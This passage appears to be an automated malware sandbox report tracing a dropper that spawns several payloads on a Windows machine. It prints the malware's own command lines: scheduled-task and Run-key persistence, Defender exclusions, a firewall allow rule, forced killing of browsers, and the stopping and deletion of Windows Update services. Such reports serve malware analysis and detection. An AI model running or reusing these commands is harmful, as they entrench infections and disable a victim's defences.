472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c495131
72f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1664 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1664 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1664 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1664 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1664 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1664 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1664 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1664 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1664 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1664 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1664 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1664 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 520 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 520 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 520 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 520 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 800 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 800 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 800 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 800 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 800 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 800 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 800 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 800 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1932 wrote to memory of 1936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 364 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 364 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 364 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 364 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 364 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 364 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 800 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 800 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 800 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe

"C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe"

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Windows\system32\taskkill.exe

taskkill /IM chrome.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230626010155.log C:\Windows\Logs\CBS\CbsPersist_20230626010155.cab

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\taskeng.exe

taskeng.exe {0A549102-D269-4809-97AB-07951E1B4B15} S-1-5-21-3419557010-3639509551-242374962-1000:IULNABEW\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\system32\schtasks.exe

